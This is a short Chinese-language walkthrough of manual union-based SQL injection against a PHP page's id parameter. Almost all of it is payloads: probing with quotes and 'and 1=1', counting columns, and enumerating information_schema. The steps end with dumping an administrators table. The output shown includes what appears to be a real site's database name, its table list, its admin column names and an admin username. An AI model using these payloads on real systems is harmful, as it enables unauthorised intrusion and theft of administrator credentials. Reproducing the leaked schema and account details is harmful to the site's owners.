1、检测到可能存在注入漏洞的url 最常用的 ‘ ,and 1=1 ,and 1=2
http://www.xxx.com/subcat.php?id=1
2、判断字段个数
http://www.xxx.com/subcat.php?id=1 order by 1
发现只有一个字段
3、查看数据库名
http://www.xxx.com/subcat.php?id=1 union select database()
数据库名是 bible_history
4、查看表名
http://www.xxx.com/subcat.php?id=1 union select group_concat(table_name) from information_schema.tables where table_schema= bible_history
有:Emails,administrators,bh_addform,bh_guestbook,bho_board_bans,bho_board_forums,bho_board_posts,bho_board_search,bho_board_topics,bho_board_users,bible_book,books,cat,categories,chapters,chapters1,commentary_jfb,eastons,guestbook,isbe,kingjames,kjv_verse,links,mathew,naves,naves_phrase,naves_verse,ob_book_abbreviation_lookup,outline_chapter
5、查看某个表的字段
http://www.xxx.com/subcat.php?id=1 union select group_concat(column_name) from information_schema.columns where table_name= administrators
字段有:admin_id,admin_username,admin_password,admin_first_name,admin_last_name
6、查看字段的值
http://www.xxx.com/subcat.php?id=1 union select admin_username from administrators
用户名:jc
参考:https://masterxsec.github.io/2017/05/10/MySQL%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5/